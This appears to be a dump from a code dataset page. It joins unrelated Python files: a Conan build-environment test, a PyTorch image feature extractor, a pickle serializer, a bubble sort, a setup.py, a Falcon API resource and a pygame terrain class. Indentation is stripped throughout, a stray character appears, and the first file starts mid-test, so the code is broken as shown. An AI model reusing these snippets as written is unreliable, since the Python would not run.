conanfile.deps_cpp_info.lib_paths.append("/two/lib/path")
tool = VisualStudioBuildEnvironment(conanfile)
self.assertEquals(tool.vars_dict, {
"CL": ["/I/one/include/path", "/I/two/include/path"],
"LIB": ["/one/lib/path", "/two/lib/path"],
})
# Now alter the paths before the vars_dict call
tool.include_paths.append("/three/include/path")
tool.lib_paths.append("/three/lib/path")
self.assertEquals(tool.vars_dict, {
"CL": ["/I/one/include/path", "/I/two/include/path", "/I/three/include/path"],
"LIB": ["/one/lib/path", "/two/lib/path", "/three/lib/path"],
})
# Now try appending to environment
with tools.environment_append({"CL": "/I/four/include/path /I/five/include/path",
"LIB": "/four/lib/path;/five/lib/path"}):
self.assertEquals(tool.vars_dict, {
"CL": ["/I/one/include/path", "/I/two/include/path",
"/I/three/include/path", "/I/four/include/path /I/five/include/path"],
"LIB": ["/one/lib/path", "/two/lib/path", "/three/lib/path", "/four/lib/path;/five/lib/path"],
})
self.assertEquals(tool.vars, {
"CL": '/I"/one/include/path" /I"/two/include/path" '
'/I"/three/include/path" /I/four/include/path /I/five/include/path',
"LIB": "/one/lib/path;/two/lib/path;/three/lib/path;/four/lib/path;/five/lib/path",
})
æ |
import math
import os
from collections import defaultdict
import PIL
from PIL import Image
from tqdm import tqdm
import torch
from torch import nn, utils
from torchvision import models, datasets, transforms
from utils import *
from .vision import VisionDataset
image_types = ['full_image', 'person_full']
image_size = [224, 224]
delimiter = '/'
def dict_for_each_episode():
return [dict() for i in range(18 + 1)] # episode index: from 1 to 18
def get_model(args):
print('Loading extractor model: using resnet18')
model = models.resnet18(pretrained=True)
extractor = nn.Sequential(*list(model.children())[:-2])
extractor.to(args.device)
return extractor
def preprocess_images(args):
print('Loading visual')
visuals = load_visual(args)
image_path = args.image_path
cache_dir = image_path / 'cache'
if not cache_dir.is_dir():
cache_dir.mkdir()
cached = {}
not_cached = {}
ext = '.pickle'
for key in image_types:
cache_path = cache_dir / (key + ext)
if cache_path.is_file():
cached[key] = cache_path
else:
not_cached[key] = cache_path
features = {key: dict_for_each_episode() for key in image_types}
for key, path in cached.items():
print("Loading %s feature cache" % key)
features[key] = load_pickle(path)
if not_cached: # not_cached not empty: some image types are not cached
not_cached_types = ', '.join(not_cached)
print('%s feature cache missing' % not_cached_types)
print('Loading image files and extracting %s features' % not_cached_types)
transform = transforms.Compose([
transforms.Resize(image_size),
transforms.ToTensor(),
# mean, std
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))
])
model = get_model(args)
episode_paths = list(image_path.glob('*'))
for e in tqdm(episode_paths, desc='Episode'):
shot_paths = list(e.glob('*/*')) # episode/scene/shot
# Load image and flatten
images = load_images(shot_paths)
images = {"{}{}{}".format(vid, delimiter, name): image for vid, shots in images.items() for name, image in shots.items()}
dataset = ObjectDataset(args, images, visuals, not_cached, transform=transform)
chunk = extract_features(args, dataset, model)
for key in image_types:
for episode_total, episode_part in zip(features[key], chunk[key]):
episode_total.update(episode_part)
del images, dataset # delete data to retrieve memory
del model # delete extractor model to retrieve memory
if args.cache_image_vectors:
for key, path in not_cached.items():
print("Saving %s feature cache as %s" % (key, path))
save_pickle(features[key], path)
return features, visuals
def load_images(shot_paths):
"""
images = {
shot1: {
frame_id1: PIL image1,
...
},
...
}
"""
images = list(tqdm(map(load_image, shot_paths), total=len(shot_paths), desc='loading images'))
images = {k: v for k, v in images}
return images
def load_image(shot_path):
"""
res = {
frame_id1: PIL image1,
...
}
"""
image_paths = shot_path.glob('*')
vid = '_'.join(shot_path.parts[-3:])
res = {}
image_paths = sorted(list(image_paths))
for image_path in image_paths:
name = image_path.parts[-1] # name ex) IMAGE_0000046147.jpg
image = Image.open(image_path)
res[name] = image
return (vid, res)
def load_visual(args):
visual = load_json(args.visual_path)
visual_by_episode = dict_for_each_episode()
for shot, frames in visual.items():
episode = get_episode_id(shot)
episode_dict = visual_by_episode[episode]
for frame in frames:
frame_id = get_frame_id(frame['frame_id'])
episode_dict[frame_id] = frame
return visual_by_episode
class ObjectDataset(VisionDataset):
def __init__(self, args, images, visuals, not_cached, **kwargs):
super(ObjectDataset, self).__init__('~/', **kwargs)
self.args = args
self.images = list([(k, v) for k, v in images.items()])
self.visuals = visuals
self.not_cached = not_cached
def __len__(self):
return len(self.images)
def __getitem__(self, idx):
key, pil_full_image = self.images[idx]
episode = get_episode_id(key)
frame = get_frame_id(key)
visual = self.visuals[episode].get(frame, None)
data = {'key': (episode, frame)}
if self.transform is not None:
full_image = self.transform(pil_full_image)
if 'full_image' in self.not_cached:
data['full_image'] = full_image
if 'person_full' in self.not_cached:
data['person_full'] = self.get_person_full(pil_full_image, visual, full_image) # use full image for padding
return data
def collate_fn(self, batch):
collected = defaultdict(list)
for data in batch:
for key, value in data.items():
collected[key].append(value)
if 'full_image' in self.not_cached:
collected['full_image'] = torch.stack(collected['full_image'])
return collected
def get_person_full(self, pil_full_image, visual, padding):
person_fulls = []
if visual is not None:
persons = visual["persons"]
for p in persons:
full_rect = p["person_info"]["full_rect"]
if full_rect["max_x"] != '':
person_full = transforms.functional.crop(pil_full_image, *self.bbox_transform(full_rect))
if self.transform is not None:
person_full = self.transform(person_full)
else: # no bounding box
person_full = padding
person_fulls.append(person_full)
if not person_fulls: # empty (no visual data or no person)
person_fulls.append(padding)
person_fulls = torch.stack(person_fulls)
return person_fulls
def bbox_transform(self, rect):
"""min_x, min_y, max_x, max_y -> top left corner coordinates, height, width"""
top_left_v = rect["min_y"]
top_left_h = rect["min_x"]
height = rect["max_y"] - top_left_v
width = rect["max_x"] - top_left_h
return top_left_v, top_left_h, height, width
def mean_pool(tensor, dim):
return torch.mean(tensor, dim=dim, keepdim=False)
def extract_and_pool(tensor, model, device):
tensor = tensor.to(device)
tensor = model(tensor) # N x C x H x W (N: extractor_batch_size / number of person fulls in a frame, C: 512)
tensor = mean_pool(tensor, -1) # N x C x H
tensor = mean_pool(tensor, -1) # N x C
tensor = tensor.cpu().numpy()
return tensor
def extract_features(args, dataset, model):
"""
full_images_by_episode = [
{}, # empty dict
{ (episode1)
frame_id: vector, # shape: (C,)
...
},
...
{ (episode18)
frame_id: vector,
...
}
]
person_fulls_by_episode = [
{}, # empty dict
{ (episode1)
frame_id: matrix, # shape: (N, C) N: number of person
...
},
...
{ (episode18)
frame_id: matrix,
...
}
]
"""
device = args.device
not_cached = dataset.not_cached
dataloader = utils.data.DataLoader(
dataset,
batch_size=args.extractor_batch_size,
shuffle=False,
num_workers=args.num_workers,
collate_fn=dataset.collate_fn
)
model.eval()
features = {key: dict_for_each_episode() for key in image_types}
with torch.no_grad():
for data in tqdm(dataloader, desc='extracting features'):
keys = data['key']
if 'full_image' in not_cached:
full_images = extract_and_pool(data['full_image'], model, device)
for (e, f), fi, in zip(keys, full_images):
features['full_image'][e][f] = fi
if 'person_full' in not_cached:
person_fulls = [extract_and_pool(pfu, model, device) for pfu in data['person_full']]
for (e, f), pfu in zip(keys, person_fulls):
features['person_full'][e][f] = pfu
del dataloader
return features
|
"""Serialization strategy based on the Pickle protocol."""
from typing import Any, BinaryIO
from dagger.serializer.errors import DeserializationError, SerializationError
class AsPickle:
"""
Serializer implementation that uses Pickle to marshal/unmarshal Python data structures.
Reference: https://docs.python.org/3/library/pickle.html
"""
extension = "pickle"
def serialize(self, value: Any, writer: BinaryIO):
"""Serialize a value using the Pickle protocol."""
import pickle
try:
pickle.dump(value, writer)
except (pickle.PicklingError, AttributeError) as e:
raise SerializationError(e)
def deserialize(self, reader: BinaryIO) -> Any:
"""Deserialize a pickled object into the value it represents."""
import pickle
try:
return pickle.load(reader)
except (
pickle.UnpicklingError,
AttributeError,
EOFError,
ImportError,
IndexError,
TypeError,
) as e:
raise DeserializationError(e)
def __repr__(self) -> str:
"""Get a human-readable string representation of the serializer."""
return "AsPickle()"
def __eq__(self, obj) -> bool:
"""Return true if both serializers are equivalent."""
return isinstance(obj, AsPickle)
|
def bubble_sort(array):
n = len(array)
for j in range(n - 1, 0, -1):
swapped = False
for i in range(j):
if array[i] > array[i + 1]:
swap(array, i, i + 1)
swapped = True
if not swapped:
break
def swap(array, i, j):
array[i], array[j] = array[j], array[i]
a = [5, 15, 10, 30, 3, 1, 8, 4]
bubble_sort(a)
print(a)
|
from distutils.core import setup
with open('README.rst') as f:
long_description = f.read()
setup(
name='dispatchonvalue',
version='0.9.9',
author='Ian Macinnes',
author_email='[email protected]',
packages=['dispatchonvalue', 'dispatchonvalue.test'],
url='https://github.com/minimind/dispatch-on-value-for-python',
license='MIT',
description='Provides the ability to dispatch on values using pattern '
'matching on complex, nested data structures containing '
'lists, dictionaries and primitive types',
long_description=long_description,
classifiers=[
'Development Status :: 4 - Beta',
'License :: OSI Approved :: MIT License',
'Intended Audience :: Developers',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
],
keywords=['dispatch on value', 'multiple dispatch', 'dynamic dispatch',
'pattern matching', 'value patterns', 'patterns'],
include_package_data=True,
requires=['six'],
install_requires=['six >= 1.10.0'],
)
|
"""
Module defining a Falcon resource to provide login session info
Copyright (C) 2016 ERT Inc.
"""
import falcon
import api.json as json
from api.auth import auth
route = "user"
class User():
"""
Falcon resource object providing API login session info
"""
def on_get(self, request, resp):
"""
return JSON object, representing the current session's user info
"""
user_id = auth.get_user_id(request)
# return JSON user representation
user = get_user(user_id)
json_user = json.dumps(user)
resp.body = json_user
def get_user(user_id=None):
"""
Return object representing the logged in user
Keyword Parameters:
user_id -- String, identifier representing the logged in user
(Default: None, representing an public/anonymous user session)
>>> # Check public/Anonymous user
>>> from pprint import pprint
>>> anonymous_user = get_user()
>>> pprint(anonymous_user)
{'user': {'description': 'Anonymous user.', 'id': None}}
>>> anonymous_user = get_user(None) #public/Anonymous user
>>> pprint(anonymous_user)
{'user': {'description': 'Anonymous user.', 'id': None}}
>>> # Check logged in user
>>> user = get_user('uid=bob.newhart,ou=People,o=bobnewhart.com')
>>> pprint(user)
{'user': {'description': 'Authenticated user.',
'id': 'uid=bob.newhart,ou=People,o=bobnewhart.com'}}
"""
description = "Authenticated user."
if user_id is None:
description = "Anonymous user."
attributes = {'id': user_id, 'description': description}
user_object = {'user': attributes}
return user_object
|
import util3d
import gentrack
import gentrackdata
import random
import MAIN
import pygame
enemyNumber = 20
happyNumber = 80
treeNumber = 50
class Terrain:
def __init__(self):
self.enemies = []
self.happy = []
self.trees =[]
self.lap_count = 0
gentrack.run()
self.pixelData = gentrackdata.getPixelData()
self.img = util3d.makeTexture("track.png")[0]
self.nodes = gentrack.storedResults
for x in range(happyNumber):
pos = (0,0)
while self.pixelData[pos[0]][pos[1]] != 1:
pos = (random.randint(0,1023),random.randint(0,1023))
self.happy.append(util3d.Sprite3d("windows.png",pos[0]/512-1,0,pos[1]/512-1,0.01))
for x in range(enemyNumber):
pos = (0,0)
while self.pixelData[pos[0]][pos[1]] != 1:
pos = (random.randint(0,1023),random.randint(0,1023))
self.enemies.append(util3d.Sprite3d("apple.png",pos[0]/512-1,0,pos[1]/512-1,0.01))
for x in range(treeNumber):
pos = (random.randint(0,1023),random.randint(0,1023))
while self.pixelData[pos[0]][pos[1]] != 0:
pos = (random.randint(0,1023),random.randint(0,1023))
self.trees.append(util3d.Sprite3d("tree.png",pos[0]/512-1,0,pos[1]/512-1,0.1))
#print(len(self.pixelData))
self.next_node = self.nodes[1]
self.this_node = self.nodes[0]
self.next_i = 1
def check_nodes(self,pos,r):
if (self.next_node[1]-pos[1])**2 + (self.next_node[0]-pos[0])**2 < 0.3:
self.next_i+=1
if self.next_i == len(self.nodes):
print("Lap count + 1")
self.lap_count+=1
MAIN.score += 3
if self.lap_count == 3:
return True
self.next_i %= len(self.nodes)
self.this_node = self.next_node
self.next_node = self.nodes[self.next_i]
print("Node Advanced to",self.next_i)
return False
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.